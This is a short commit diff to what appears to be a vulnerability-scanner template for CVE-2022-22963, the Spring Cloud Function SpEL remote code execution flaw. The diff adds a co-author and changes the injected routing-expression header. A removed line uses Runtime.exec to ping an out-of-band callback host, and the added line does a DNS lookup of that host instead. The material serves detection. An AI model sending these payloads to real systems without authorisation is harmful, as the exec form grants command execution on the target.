Updated CVE-2022-22963 (#4011)
parent
4f0d6c051b
commit
2686307a64
|
@ -2,7 +2,7 @@ id: CVE-2022-22963
|
|||
|
||||
info:
|
||||
name: Spring Cloud Function SPEL RCE
|
||||
author: Mr-xn
|
||||
author: Mr-xn,Adam Crosser
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
|
||||
|
@ -17,7 +17,7 @@ requests:
|
|||
- |
|
||||
POST /functionRouter HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
|
||||
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
{{rand_base(8)}}
|
||||
|
@ -33,4 +33,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
- 500
|
||||
|
|
Loading…
Reference in New Issue